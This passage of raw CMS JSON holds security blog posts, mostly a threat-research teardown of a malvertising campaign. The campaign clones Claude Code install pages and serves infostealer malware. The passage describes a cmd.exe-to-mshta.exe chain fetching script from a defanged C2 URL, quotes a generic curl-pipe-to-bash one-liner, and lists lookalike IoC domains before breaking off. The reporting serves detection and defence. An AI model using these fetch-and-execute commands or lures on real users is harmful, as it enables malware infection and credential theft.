The best chance of stopping the attack is at the point of initial access before the identity is compromised.",{"data":1777,"content":1778,"nodeType":320},{},[],{"data":1780,"content":1781,"nodeType":324},{},[1782,1787,1793,1798,1804],{"data":1783,"marks":1784,"value":1786,"nodeType":241},{},[1785],{"type":313},"Sidenote: why we're looking at attacks ",{"data":1788,"marks":1789,"value":1792,"nodeType":241},{},[1790,1791],{"type":343},{"type":313},"in",{"data":1794,"marks":1795,"value":1797,"nodeType":241},{},[1796],{"type":313}," the browser, not ",{"data":1799,"marks":1800,"value":1803,"nodeType":241},{},[1801,1802],{"type":343},{"type":313},"on",{"data":1805,"marks":1806,"value":1808,"nodeType":241},{},[1807],{"type":313}," the browser",{"data":1810,"content":1811,"nodeType":237},{},[1812,1816,1824],{"data":1813,"marks":1814,"value":1815,"nodeType":241},{},[],"Calling this a \"browser attacks\" matrix needs clarification. We're not talking about browser exploits — RCE vulnerabilities, sandbox escapes, memory corruption bugs. Those attacks target the browser itself, they're extraordinarily expensive to develop, and they're increasingly rare. Browser zero-days hit a",{"data":1817,"content":1819,"nodeType":260},{"uri":1818},"https://cloud.google.com/blog/topics/threat-intelligence/2025-zero-day-review",[1820],{"data":1821,"marks":1822,"value":1823,"nodeType":241},{},[]," historic low of 9%",{"data":1825,"marks":1826,"value":1827,"nodeType":241},{},[]," of all zero-days reported to Google, and a Chrome RCE commands a $250,000 bug bounty.",{"data":1829,"content":1830,"nodeType":237},{},[1831],{"data":1832,"marks":1833,"value":1834,"nodeType":241},{},[],"In comparison, a one-year phishing kit rental costs $1,000. A bulk stolen credential list costs $15. An initial-access-broker-provided IdP admin account costs $3,000. 
When it costs orders of magnitude less to exploit the person using the browser than to exploit the browser itself, attackers will take the cheaper option every time.",{"data":1836,"content":1837,"nodeType":237},{},[1838],{"data":1839,"marks":1840,"value":1841,"nodeType":241},{},[],"It's worth heading off the obvious counterargument: won't AI-assisted vulnerability discovery eventually make browser exploits cheaper? Perhaps — but it will simultaneously make them easier for browser vendors to find and patch, and vendors like Google and Microsoft have the engineering capacity and financial incentive to scale AI-driven remediation far faster than attackers can scale exploit development.",{"data":1843,"content":1844,"nodeType":320},{},[],{"data":1846,"content":1847,"nodeType":324},{},[1848],{"data":1849,"marks":1850,"value":1852,"nodeType":241},{},[1851],{"type":313},"What hasn't changed",{"data":1854,"content":1855,"nodeType":237},{},[1856,1860,1868],{"data":1857,"marks":1858,"value":1859,"nodeType":241},{},[],"The matrix remains open-source, community-maintained, and available on",{"data":1861,"content":1863,"nodeType":260},{"uri":1862},"https://github.com/pushsecurity/saas-attacks",[1864],{"data":1865,"marks":1866,"value":1867,"nodeType":241},{},[]," GitHub",{"data":1869,"marks":1870,"value":1871,"nodeType":241},{},[],". 
The goal is the same as it was in 2023: to give offensive and defensive security teams a shared reference point for the techniques that matter most.",{"data":1873,"content":1874,"nodeType":237},{},[1875],{"data":1876,"marks":1877,"value":1878,"nodeType":241},{},[],"We built it because there was a gap in how the industry talked about these techniques, and that gap still exists — MITRE ATT&CK remains essential for endpoint and network TTPs, but the browser-based, identity-first techniques behind most modern breaches are still underrepresented in traditional frameworks.",{"data":1880,"content":1881,"nodeType":237},{},[1882],{"data":1883,"marks":1884,"value":1885,"nodeType":241},{},[],"We continue to maintain the matrix with input from red teams, detection engineers, and threat researchers across the community. Some of the most valuable additions over the past two years have come from practitioners who encountered a technique on an engagement or in an investigation and contributed it back to the repository.",{"data":1887,"content":1888,"nodeType":237},{},[1889,1893,1901],{"data":1890,"marks":1891,"value":1892,"nodeType":241},{},[],"If you're an offensive security professional using these techniques on engagements, or a defender building detections against them, we want to hear from you. 
Submit a PR, open a discussion, or flag a technique we've missed on ",{"data":1894,"content":1896,"nodeType":260},{"uri":1895},"https://github.com/pushsecurity/browser-identity-attacks-matrix",[1897],{"data":1898,"marks":1899,"value":1900,"nodeType":241},{},[],"GitHub",{"data":1902,"marks":1903,"value":442,"nodeType":241},{},[],{"data":1905,"content":1906,"nodeType":320},{},[],{"data":1908,"content":1909,"nodeType":324},{},[1910],{"data":1911,"marks":1912,"value":1914,"nodeType":241},{},[1913],{"type":313},"Looking ahead",{"data":1916,"content":1917,"nodeType":237},{},[1918],{"data":1919,"marks":1920,"value":1921,"nodeType":241},{},[],"The pace of attacker innovation in browser-based initial access techniques over the past 18 months has been unlike anything we've tracked before — technique after technique moving from research curiosity to industrialized criminal tooling within months, not years.",{"data":1923,"content":1924,"nodeType":1752},{},[1925,1935,1945],{"data":1926,"content":1927,"nodeType":1687},{},[1928],{"data":1929,"content":1930,"nodeType":237},{},[1931],{"data":1932,"marks":1933,"value":1934,"nodeType":241},{},[],"AiTM platforms are adding authorization-based attack options alongside their credential-harvesting capabilities.",{"data":1936,"content":1937,"nodeType":1687},{},[1938],{"data":1939,"content":1940,"nodeType":237},{},[1941],{"data":1942,"marks":1943,"value":1944,"nodeType":241},{},[],"ClickFix has spawned fully browser-native variants.",{"data":1946,"content":1947,"nodeType":1687},{},[1948],{"data":1949,"content":1950,"nodeType":237},{},[1951],{"data":1952,"marks":1953,"value":1954,"nodeType":241},{},[],"AI is lowering the cost of producing convincing social engineering and phishing infrastructure at scale.",{"data":1956,"content":1957,"nodeType":237},{},[1958],{"data":1959,"marks":1960,"value":1961,"nodeType":241},{},[],"We don't see any of this slowing down, and that's exactly why thinking about these attacks as a browser problem instead of 
siloing them across email, endpoint, network, and cloud categories — each with a partial view of the picture, and still missing the whole when combined — is so important.",{"data":1963,"content":1964,"nodeType":237},{},[1965,1969,1976],{"data":1966,"marks":1967,"value":1968,"nodeType":241},{},[],"The Browser & Identity Attacks Matrix is our contribution to keeping that shared understanding current. You can",{"data":1970,"content":1971,"nodeType":260},{"uri":61},[1972],{"data":1973,"marks":1974,"value":1975,"nodeType":241},{},[]," explore the matrix here",{"data":1977,"marks":1978,"value":442,"nodeType":241},{},[],{"data":1980,"content":1981,"nodeType":237},{},[1982,1986,1994],{"data":1983,"marks":1984,"value":1985,"nodeType":241},{},[],"You can also read our recent",{"data":1987,"content":1989,"nodeType":260},{"uri":1988},"https://pushsecurity.com/thank-you/browser-attacks-report",[1990],{"data":1991,"marks":1992,"value":1993,"nodeType":241},{},[]," browser attack techniques report",{"data":1995,"marks":1996,"value":1997,"nodeType":241},{},[]," for more information.",{"data":1999,"content":2003,"nodeType":292},{"target":2000},{"sys":2001},{"id":2002,"type":297,"linkType":298},"1hx6sxpyEzxn4F4jc1RGQi",[],{"data":2005,"content":2006,"nodeType":320},{},[],{"data":2008,"content":2009,"nodeType":237},{},[2010],{"data":2011,"marks":2012,"value":2013,"nodeType":241},{},[],"Push Security is the most powerful AI-native security tool in the browser. Think EDR, but for the browser — high-fidelity telemetry and real-time control across every session, on every device, with no browser migration required. 
Security teams use Push to detect and stop advanced browser-based attacks like AiTM phishing, ClickFix, and session hijacking; gain visibility and control over AI tool usage across their workforce; harden identities by surfacing credential reuse, SSO gaps, and shadow IT; and support data loss and insider investigations with browser-layer telemetry that other tools can't see.",{"data":2015,"content":2016,"nodeType":237},{},[2017,2021,2029],{"data":2018,"marks":2019,"value":2020,"nodeType":241},{},[],"Book a",{"data":2022,"content":2024,"nodeType":260},{"uri":2023},"https://pushsecurity.com/demo",[2025],{"data":2026,"marks":2027,"value":2028,"nodeType":241},{},[]," live demo",{"data":2030,"marks":2031,"value":2032,"nodeType":241},{},[]," to learn more.","Introducing the Browser & Identity Attacks Matrix","We're re-releasing the SaaS attack matrix as the Browser & Identity Attacks Matrix. Here's why we've decided to make the change and what it means.","introducing-the-browser-and-identity-attacks-matrix",{"items":2037},[2038,2042],{"sys":2039,"name":2041},{"id":2040},"6A5RXS31ZQx3PwryGb1IMy","Browser-based attacks",{"sys":2043,"name":2045},{"id":2044},"4ksQNCFeBf8H4QIORqpRLw","Detection & response",{"items":2047},[2048],{"fullName":2049,"firstName":2050,"jobTitle":2051,"profilePicture":2052},"Dan Green","Dan","Threat 
Research",{"url":2053},"https://images.ctfassets.net/y1cdw1ablpvd/7jik1VhFgA3kgzXBXTm2Vw/fcd8c171da644903d0827eafcfbcaad0/Dan_Headshot_2025.png",{"__typename":1180,"sys":2055,"publishedDate":2057,"content":2058,"title":3065,"synopsis":3066,"hashTags":62,"slug":3067,"tagsCollection":3068,"authorsCollection":3074},{"id":2056},"7bG71Eo43crbIHKzczooVS","2026-03-06T00:00:00.000Z",{"json":2059},{"nodeType":233,"data":2060,"content":2061},{},[2062,2068,2075,2082,2090,2106,2112,2115,2123,2130,2137,2144,2151,2158,2165,2172,2179,2185,2191,2198,2204,2211,2218,2224,2230,2236,2242,2261,2273,2280,2286,2293,2300,2333,2340,2348,2355,2361,2368,2374,2381,2399,2406,2409,2417,2424,2519,2526,2532,2535,2543,2550,2557,2564,2608,2611,2619,2635,2642,2650,2860,2868,2901,2909,2918,2924,2932,2939,2947,2958,2966,2972,2980,2991,2999,3007,3015,3023,3031,3039,3050,3057],{"nodeType":292,"data":2063,"content":2067},{"target":2064},{"sys":2065},{"id":2066,"type":297,"linkType":298},"38JCcRQe2tN9ooHGwreoF5",[],{"nodeType":237,"data":2069,"content":2070},{},[2071],{"nodeType":241,"value":2072,"marks":2073,"data":2074},"There was a time, not that long ago, when pasting a command from a website straight into your terminal was something you’d only try once before some grizzled senior engineer beat it out of you. That’s because you’re effectively handing a website a blank cheque to execute whatever it wants on your system.",[],{},{"nodeType":237,"data":2076,"content":2077},{},[2078],{"nodeType":241,"value":2079,"marks":2080,"data":2081},"But somehow, it’s now the default. Homebrew, Rust, nvm, Bun, oh-my-zsh and hundreds of the most widely used developer tools on the planet now ship with the same instructions. Copy a “curl to bash” ( curl https://some.website | bash) one-liner from a website, paste it into your terminal, and hit enter. 
The entire security model boils down to \"trust the domain.\" And with AI adoption encouraging more non-technical users to work with the kind of tools that only devs used to use, this suddenly becomes a threat to a much larger, less security conscious pool of users.",[],{},{"nodeType":237,"data":2083,"content":2084},{},[2085],{"nodeType":241,"value":2086,"marks":2087,"data":2089},"It’s not hard to see how attackers can exploit this. ",[2088],{"type":313},{},{"nodeType":237,"data":2091,"content":2092},{},[2093,2097,2102],{"nodeType":241,"value":2094,"marks":2095,"data":2096},"We're tracking a technique we're calling ",[],{},{"nodeType":241,"value":2098,"marks":2099,"data":2101},"InstallFix",[2100],{"type":313},{},{"nodeType":241,"value":2103,"marks":2104,"data":2105},": a clever social engineering attack where threat actors clone the installation pages of legitimate CLI tools and present victims with malicious install commands disguised as the real thing. In each case, the mechanic is the same: the victim sees what looks like a familiar install command, copies it, pastes it, and runs it. Except the command they run is not the one they expected.",[],{},{"nodeType":292,"data":2107,"content":2111},{"target":2108},{"sys":2109},{"id":2110,"type":297,"linkType":298},"6VMkuQkU5L0vObxIojI1Xw",[],{"nodeType":320,"data":2113,"content":2114},{},[],{"nodeType":324,"data":2116,"content":2117},{},[2118],{"nodeType":241,"value":2119,"marks":2120,"data":2122},"InstallFix Claude Code campaign teardown",[2121],{"type":313},{},{"nodeType":237,"data":2124,"content":2125},{},[2126],{"nodeType":241,"value":2127,"marks":2128,"data":2129},"All you need to make this attack work is a popular tool you can impersonate. Naturally, this makes trendy AI tools a popular choice. Then, you just need to boost your lure to deliver it to unsuspecting victims via search engine. The most common way of doing this is through sponsored results — aka malvertising. 
",[],{},{"nodeType":237,"data":2131,"content":2132},{},[2133],{"nodeType":241,"value":2134,"marks":2135,"data":2136},"In the recent examples identified by Push researchers, attackers have simply cloned the installation webpages for tools and updated the installation instructions with malicious commands. ",[],{},{"nodeType":605,"data":2138,"content":2139},{},[2140],{"nodeType":241,"value":2141,"marks":2142,"data":2143},"A new campaign targeting Claude Code",[],{},{"nodeType":237,"data":2145,"content":2146},{},[2147],{"nodeType":241,"value":2148,"marks":2149,"data":2150},"We've recently observed a campaign that puts this technique into practice against one of the fastest-growing developer tools on the market: Anthropic's Claude Code.",[],{},{"nodeType":237,"data":2152,"content":2153},{},[2154],{"nodeType":241,"value":2155,"marks":2156,"data":2157},"Claude Code is a command-line AI coding assistant that has rapidly become the go-to for both experienced developers and amateur vibe-coders. Like many modern CLI tools, the recommended installation method is a one-liner that pipes a remote script into a shell. ",[],{},{"nodeType":237,"data":2159,"content":2160},{},[2161],{"nodeType":241,"value":2162,"marks":2163,"data":2164},"The attacker's approach is straightforward. They clone the Claude Code installation page (layout, branding, documentation sidebar, and all), hosting it on a lookalike domain. The page is a near-pixel-perfect replica of the real thing. The only meaningful difference is in the installation commands themselves: instead of fetching the install script from claude.ai, the commands point to an attacker-controlled server that serves malware instead. 
",[],{},{"nodeType":237,"data":2166,"content":2167},{},[2168],{"nodeType":241,"value":2169,"marks":2170,"data":2171},"Unless you’re carefully reading the URL embedded in the install one-liner (and let's be honest, almost nobody does these days), the page is indistinguishable from the real one.",[],{},{"nodeType":237,"data":2173,"content":2174},{},[2175],{"nodeType":241,"value":2176,"marks":2177,"data":2178},"You can see a video of a user being served a malicious InstallFix page below.",[],{},{"nodeType":292,"data":2180,"content":2184},{"target":2181},{"sys":2182},{"id":2183,"type":297,"linkType":298},"1dhirnghbpAwyCse8cjAas",[],{"nodeType":292,"data":2186,"content":2190},{"target":2187},{"sys":2188},{"id":2189,"type":297,"linkType":298},"5TBnCFM4Y5CoqKPchHDpyv",[],{"nodeType":237,"data":2192,"content":2193},{},[2194],{"nodeType":241,"value":2195,"marks":2196,"data":2197},"Any further interaction on the page simply redirects you to the legitimate site, too. So a victim that lands on the page and follows the fake instructions could continue normally without realizing anything had gone wrong. 
",[],{},{"nodeType":292,"data":2199,"content":2203},{"target":2200},{"sys":2201},{"id":2202,"type":297,"linkType":298},"5g3joJSAP8y8xv2bKaLGe2",[],{"nodeType":605,"data":2205,"content":2206},{},[2207],{"nodeType":241,"value":2208,"marks":2209,"data":2210},"Distribution via Google Ads",[],{},{"nodeType":237,"data":2212,"content":2213},{},[2214],{"nodeType":241,"value":2215,"marks":2216,"data":2217},"The fake install pages are distributed exclusively through Google Ads, specifically through sponsored search results that appear when users search for terms like \"Claude Code\", \"Claude Code install\", or \"Claude Code CLI.\"",[],{},{"nodeType":292,"data":2219,"content":2223},{"target":2220},{"sys":2221},{"id":2222,"type":297,"linkType":298},"3CTtrOy3q8NoMblxkLlTer",[],{"nodeType":292,"data":2225,"content":2229},{"target":2226},{"sys":2227},{"id":2228,"type":297,"linkType":298},"4m5rg9UhRQK0e8OfYFlIUc",[],{"nodeType":292,"data":2231,"content":2235},{"target":2232},{"sys":2233},{"id":2234,"type":297,"linkType":298},"25lAkq9tTZ2Mq52gs6xR8G",[],{"nodeType":292,"data":2237,"content":2241},{"target":2238},{"sys":2239},{"id":2240,"type":297,"linkType":298},"4f4svuW3tjhNc3kEfCwNRG",[],{"nodeType":237,"data":2243,"content":2244},{},[2245,2249,2257],{"nodeType":241,"value":2246,"marks":2247,"data":2248},"Malvertising via Google Search is an effective delivery vector because it bypasses email-based security controls entirely. There's no phishing email to flag, no suspicious link in a message. The user initiates the interaction themselves by searching for something they genuinely intend to install. 
This is one of the reasons that attackers are ",[],{},{"nodeType":260,"data":2250,"content":2251},{"uri":1161},[2252],{"nodeType":241,"value":2253,"marks":2254,"data":2256},"doubling down on targeting ad manager accounts",[2255],{"type":573},{},{"nodeType":241,"value":2258,"marks":2259,"data":2260}," to be able to hijack existing ad budgets and spin up even more malicious ads.",[],{},{"nodeType":237,"data":2262,"content":2263},{},[2264,2269],{"nodeType":241,"value":2265,"marks":2266,"data":2268},"The reality is that users are going to encounter malicious links through stealthy channels like malvertising every day, just through normal internet browsing",[2267],{"type":313},{},{"nodeType":241,"value":2270,"marks":2271,"data":2272},", without being actively targeted. That said, ads can be targeted too: Google Ads can be tuned to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). So if you've got sufficient intel on your target, you can tailor the ad accordingly. ",[],{},{"nodeType":237,"data":2274,"content":2275},{},[2276],{"nodeType":241,"value":2277,"marks":2278,"data":2279},"Since the sponsored result appears above the organic results for the legitimate Claude Code documentation and the displayed URL in the ad appears plausible, victims are more likely to quickly click and access the domain without checking it out fully. 
Search engines typically suppress subdomains from displayed URLs too, giving the attacker additional cover for the lookalike domain.",[],{},{"nodeType":292,"data":2281,"content":2285},{"target":2282},{"sys":2283},{"id":2284,"type":297,"linkType":298},"4Ihz5BcRK0NDVy0ANg2PWe",[],{"nodeType":605,"data":2287,"content":2288},{},[2289],{"nodeType":241,"value":2290,"marks":2291,"data":2292},"The payload",[],{},{"nodeType":237,"data":2294,"content":2295},{},[2296],{"nodeType":241,"value":2297,"marks":2298,"data":2299},"The malware initiates execution through cmd.exe (PID 8444), which spawns mshta.exe (PID 8700) to retrieve and execute content from a remote URL. The command structure indicates staged execution:",[],{},{"nodeType":1752,"data":2301,"content":2302},{},[2303,2313,2323],{"nodeType":1687,"data":2304,"content":2305},{},[2306],{"nodeType":237,"data":2307,"content":2308},{},[2309],{"nodeType":241,"value":2310,"marks":2311,"data":2312},"cmd.exe executes a command-line instruction to launch mshta.exe with a URL parameter pointing to https://claude[.]update-version[.]com/claude",[],{},{"nodeType":1687,"data":2314,"content":2315},{},[2316],{"nodeType":237,"data":2317,"content":2318},{},[2319],{"nodeType":241,"value":2320,"marks":2321,"data":2322},"mshta.exe (child process) is invoked to fetch and execute HTML/script content from the malicious domain",[],{},{"nodeType":1687,"data":2324,"content":2325},{},[2326],{"nodeType":237,"data":2327,"content":2328},{},[2329],{"nodeType":241,"value":2330,"marks":2331,"data":2332},"conhost.exe (PID 8496) is spawned as a console host, likely to support command execution output",[],{},{"nodeType":237,"data":2334,"content":2335},{},[2336],{"nodeType":241,"value":2337,"marks":2338,"data":2339},"The MacOS payload also uses additional encoding and staged execution layers.",[],{},{"nodeType":237,"data":2341,"content":2342},{},[2343],{"nodeType":241,"value":2344,"marks":2345,"data":2347},"You can see the full list of IoCs at the end of the 
blog.   ",[2346],{"type":313},{},{"nodeType":237,"data":2349,"content":2350},{},[2351],{"nodeType":241,"value":2352,"marks":2353,"data":2354},"Our analysis shows us that the payload matches the Yara signatures for the Amatera Stealer malware, retrieved from the command-and-control domain claude[.]update-version[.]com.",[],{},{"nodeType":292,"data":2356,"content":2360},{"target":2357},{"sys":2358},{"id":2359,"type":297,"linkType":298},"TXcSp34sIAOKIXlKT4Lb0",[],{"nodeType":237,"data":2362,"content":2363},{},[2364],{"nodeType":241,"value":2365,"marks":2366,"data":2367},"Notably, we saw different sites executing identical binaries, further indicating that these are part of a single attacker campaign. ",[],{},{"nodeType":292,"data":2369,"content":2373},{"target":2370},{"sys":2371},{"id":2372,"type":297,"linkType":298},"3ExLtcl6df07BcKPsGZn42",[],{"nodeType":605,"data":2375,"content":2376},{},[2377],{"nodeType":241,"value":2378,"marks":2379,"data":2380},"Abusing legitimate hosting services",[],{},{"nodeType":237,"data":2382,"content":2383},{},[2384,2388,2395],{"nodeType":241,"value":2385,"marks":2386,"data":2387},"Another common theme we see across pretty much every phishing site these days is the abuse of legitimate domains for hosting malicious content. This allows attackers to blend in with normal web traffic and is a core ",[],{},{"nodeType":260,"data":2389,"content":2390},{"uri":770},[2391],{"nodeType":241,"value":773,"marks":2392,"data":2394},[2393],{"type":573},{},{"nodeType":241,"value":2396,"marks":2397,"data":2398},". ",[],{},{"nodeType":237,"data":2400,"content":2401},{},[2402],{"nodeType":241,"value":2403,"marks":2404,"data":2405},"In this case, we observed Cloudflare Pages (pages.dev), Squarespace, and Tencent EdgeOne being used. 
",[],{},{"nodeType":320,"data":2407,"content":2408},{},[],{"nodeType":324,"data":2410,"content":2411},{},[2412],{"nodeType":241,"value":2413,"marks":2414,"data":2416},"A broader trend",[2415],{"type":313},{},{"nodeType":237,"data":2418,"content":2419},{},[2420],{"nodeType":241,"value":2421,"marks":2422,"data":2423},"This isn't happening in isolation. Claude and its associated tools have become a recurring target for recent malware distribution campaigns:",[],{},{"nodeType":1752,"data":2425,"content":2426},{},[2427,2450,2473,2496],{"nodeType":1687,"data":2428,"content":2429},{},[2430],{"nodeType":237,"data":2431,"content":2432},{},[2433,2436,2446],{"nodeType":241,"value":29,"marks":2434,"data":2435},[],{},{"nodeType":260,"data":2437,"content":2439},{"uri":2438},"https://www.bleepingcomputer.com/news/security/claude-llm-artifacts-abused-to-push-mac-infostealers-in-clickfix-attack/",[2440],{"nodeType":241,"value":2441,"marks":2442,"data":2445},"Fake Claude artifacts used in traditional ClickFix lures",[2443,2444],{"type":573},{"type":313},{},{"nodeType":241,"value":2447,"marks":2448,"data":2449},": Attackers created public pages on the claude.ai domain itself (user-generated content that inherited the domain's trust) containing malicious terminal commands disguised as macOS utilities. 
These were promoted via hijacked Google Ads and viewed over 15,000 times before being taken down.",[],{},{"nodeType":1687,"data":2451,"content":2452},{},[2453],{"nodeType":237,"data":2454,"content":2455},{},[2456,2459,2469],{"nodeType":241,"value":29,"marks":2457,"data":2458},[],{},{"nodeType":260,"data":2460,"content":2462},{"uri":2461},"https://hunt.io/blog/fake-homebrew-clickfix-cuckoo-stealer-macos",[2463],{"nodeType":241,"value":2464,"marks":2465,"data":2468},"Fake Homebrew installation pages",[2466,2467],{"type":573},{"type":313},{},{"nodeType":241,"value":2470,"marks":2471,"data":2472},": Near-identical clones of the Homebrew website delivering the Cuckoo infostealer to macOS users, using the same \"copy this install command\" mechanic.",[],{},{"nodeType":1687,"data":2474,"content":2475},{},[2476],{"nodeType":237,"data":2477,"content":2478},{},[2479,2482,2492],{"nodeType":241,"value":29,"marks":2480,"data":2481},[],{},{"nodeType":260,"data":2483,"content":2485},{"uri":2484},"https://www.huntress.com/blog/openclaw-github-ghostsocks-infostealer",[2486],{"nodeType":241,"value":2487,"marks":2488,"data":2491},"Fake OpenClaw installers on GitHub",[2489,2490],{"type":573},{"type":313},{},{"nodeType":241,"value":2493,"marks":2494,"data":2495},": Malicious repositories impersonating the popular AI agent tool, boosted by Bing's AI search results, delivering infostealers and the GhostSocks proxy malware.",[],{},{"nodeType":1687,"data":2497,"content":2498},{},[2499],{"nodeType":237,"data":2500,"content":2501},{},[2502,2505,2515],{"nodeType":241,"value":29,"marks":2503,"data":2504},[],{},{"nodeType":260,"data":2506,"content":2508},{"uri":2507},"https://thehackernews.com/2026/02/malicious-npm-packages-harvest-crypto.html",[2509],{"nodeType":241,"value":2510,"marks":2511,"data":2514},"Trojanised npm packages",[2512,2513],{"type":573},{"type":313},{},{"nodeType":241,"value":2516,"marks":2517,"data":2518},": Malicious packages mimicking Claude Code's official npm package 
name, targeting developers who might make a typo or trust an unofficial source.",[],{},{"nodeType":237,"data":2520,"content":2521},{},[2522],{"nodeType":241,"value":2523,"marks":2524,"data":2525},"But this isn’t just a Claude problem — any tool or site that is likely to get clicks, and can be easily cloned, is a potential target for malvertising and impersonation. For example, we’ve also recently seen attackers target free web tools with clever ClickFix lures that only load after an attacker has interacted with the page — in the example below, uploading a file to remove an image background, or convert a document to PDF. These are clones of real sites that attackers have cloned because they allow them to intercept users entering common search terms. ",[],{},{"nodeType":292,"data":2527,"content":2531},{"target":2528},{"sys":2529},{"id":2530,"type":297,"linkType":298},"6fbQRdi1xXzMOmYTcAGDLc",[],{"nodeType":320,"data":2533,"content":2534},{},[],{"nodeType":605,"data":2536,"content":2537},{},[2538],{"nodeType":241,"value":2539,"marks":2540,"data":2542},"How Push detects InstallFix",[2541],{"type":313},{},{"nodeType":237,"data":2544,"content":2545},{},[2546],{"nodeType":241,"value":2547,"marks":2548,"data":2549},"Regardless of the delivery channel, whether it's a phishing email, a malvertising lure, or a fake install page, all roads lead to a web page loaded in the user's browser, and that's where Push operates.",[],{},{"nodeType":237,"data":2551,"content":2552},{},[2553],{"nodeType":241,"value":2554,"marks":2555,"data":2556},"Push sees what the user sees: the page as it renders in the browser, in real time. 
This means we can detect InstallFix pages by identifying the combination of signals that characterise them: lookalike domains impersonating known developer tools, copy-to-clipboard elements containing shell commands, and the presence of malvertising delivery indicators.",[],{},{"nodeType":237,"data":2558,"content":2559},{},[2560],{"nodeType":241,"value":2561,"marks":2562,"data":2563},"Because Push detects threats directly in the browser, it doesn't matter that the attack came from a Google Search ad rather than an email. There's no phishing email for a Secure Email Gateway to inspect — the user searched for and navigated to the page themselves. But the page still loads in the browser, where Push is there to catch it.",[],{},{"nodeType":237,"data":2565,"content":2566},{},[2567,2571,2580,2584,2593,2597,2605],{"nodeType":241,"value":2568,"marks":2569,"data":2570},"To learn more about how Push protects against InstallFix, ClickFix, and other browser-based attacks, ",[],{},{"nodeType":260,"data":2572,"content":2574},{"uri":2573},"https://pushsecurity.com/resources/product-brochure",[2575],{"nodeType":241,"value":2576,"marks":2577,"data":2579},"check out our latest product overview",[2578],{"type":573},{},{"nodeType":241,"value":2581,"marks":2582,"data":2583},", ",[],{},{"nodeType":260,"data":2585,"content":2587},{"uri":2586},"https://pushsecurity.com/product-demo/",[2588],{"nodeType":241,"value":2589,"marks":2590,"data":2592},"visit our demo library",[2591],{"type":573},{},{"nodeType":241,"value":2594,"marks":2595,"data":2596},", or ",[],{},{"nodeType":260,"data":2598,"content":2599},{"uri":2023},[2600],{"nodeType":241,"value":2601,"marks":2602,"data":2604},"book some time with one of our team for a live 
demo",[2603],{"type":573},{},{"nodeType":241,"value":442,"marks":2606,"data":2607},[],{},{"nodeType":320,"data":2609,"content":2610},{},[],{"nodeType":324,"data":2612,"content":2613},{},[2614],{"nodeType":241,"value":2615,"marks":2616,"data":2618},"IoCs",[2617],{"type":313},{},{"nodeType":237,"data":2620,"content":2621},{},[2622,2625,2632],{"nodeType":241,"value":894,"marks":2623,"data":2624},[],{},{"nodeType":260,"data":2626,"content":2627},{"uri":899},[2628],{"nodeType":241,"value":902,"marks":2629,"data":2631},[2630],{"type":573},{},{"nodeType":241,"value":906,"marks":2633,"data":2634},[],{},{"nodeType":237,"data":2636,"content":2637},{},[2638],{"nodeType":241,"value":2639,"marks":2640,"data":2641},"This is a fast-moving situation, with domains constantly being spun up. At the time of writing, the domains observed were:",[],{},{"nodeType":237,"data":2643,"content":2644},{},[2645],{"nodeType":241,"value":2646,"marks":2647,"data":2649},"Cloned domains:",[2648],{"type":313},{},{"nodeType":1752,"data":2651,"content":2652},{},[2653,2663,2673,2683,2693,2703,2712,2722,2732,2741,2751,2761,2771,2781,2791,2801,2811,2820,2830,2840,2850],{"nodeType":1687,"data":2654,"content":2655},{},[2656],{"nodeType":237,"data":2657,"content":2658},{},[2659],{"nodeType":241,"value":2660,"marks":2661,"data":2662},"claud-code[.]pages[.]dev",[],{},{"nodeType":1687,"data":2664,"content":2665},{},[2666],{"nodeType":237,"data":2667,"content":2668},{},[2669],{"nodeType":241,"value":2670,"marks":2671,"data":2672},"claulastver[.]squarespace[.]com",[],{},{"nodeType":1687,"data":2674,"content":2675},{},[2676],{"nodeType":237,"data":2677,"content":2678},{},[2679],{"nodeType":241,"value":2680,"marks":2681,"data":2682},"claudecode-developers[.]squarespace[.]com",[],{},{"nodeType":1687,"data":2684,"content":2685},{},[2686],{"nodeType":237,"data":2687,"content":2688},{},[2689],{"nodeType":241,"value":2690,"marks":2691,"data":2692},"hgjbulk[.]pages[.]dev",[],{},{"nodeType":1687,"data":2694,"content":2695},{
},[2696],{"nodeType":237,"data":2697,"content":2698},{},[2699],{"nodeType":241,"value":2700,"marks":2701,"data":2702},"jhgyuifyfiguohi[.]pages[.]dev",[],{},{"nodeType":1687,"data":2704,"content":2705},{},[2706],{"nodeType":237,"data":2707,"content":2708},{},[2709],{"nodeType":241,"value":2690,"marks":2710,"data":2711},[],{},{"nodeType":1687,"data":2713,"content":2714},{},[2715],{"nodeType":237,"data":2716,"content":2717},{},[2718],{"nodeType":241,"value":2719,"marks":2720,"data":2721},"claude-code-install[.]squarespace[.]com",[],{},{"nodeType":1687,"data":2723,"content":2724},{},[2725],{"nodeType":237,"data":2726,"content":2727},{},[2728],{"nodeType":241,"value":2729,"marks":2730,"data":2731},"claude-code-docs-site[.]pages[.]dev",[],{},{"nodeType":1687,"data":2733,"content":2734},{},[2735],{"nodeType":237,"data":2736,"content":2737},{},[2738],{"nodeType":241,"value":2670,"marks":2739,"data":2740},[],{},{"nodeType":1687,"data":2742,"content":2743},{},[2744],{"nodeType":237,"data":2745,"content":2746},{},[2747],{"nodeType":241,"value":2748,"marks":2749,"data":2750},"cladueall[.]pages[.]dev",[],{},{"nodeType":1687,"data":2752,"content":2753},{},[2754],{"nodeType":237,"data":2755,"content":2756},{},[2757],{"nodeType":241,"value":2758,"marks":2759,"data":2760},"claude-code-docs-dvlr2jpuuw[.]edgeone[.]app",[],{},{"nodeType":1687,"data":2762,"content":2763},{},[2764],{"nodeType":237,"data":2765,"content":2766},{},[2767],{"nodeType":241,"value":2768,"marks":2769,"data":2770},"myclauda[.]it[.]com",[],{},{"nodeType":1687,"data":2772,"content":2773},{},[2774],{"nodeType":237,"data":2775,"content":2776},{},[2777],{"nodeType":241,"value":2778,"marks":2779,"data":2780},"vdsafsaf[.]it[.]com",[],{},{"nodeType":1687,"data":2782,"content":2783},{},[2784],{"nodeType":237,"data":2785,"content":2786},{},[2787],{"nodeType":241,"value":2788,"marks":2789,"data":2790},"asdasdasdadsvvvvv[.]pages[.]dev/",[],{},{"nodeType":1687,"data":2792,"content":2793},{},[2794],{"nodeType":237,"data":2795,
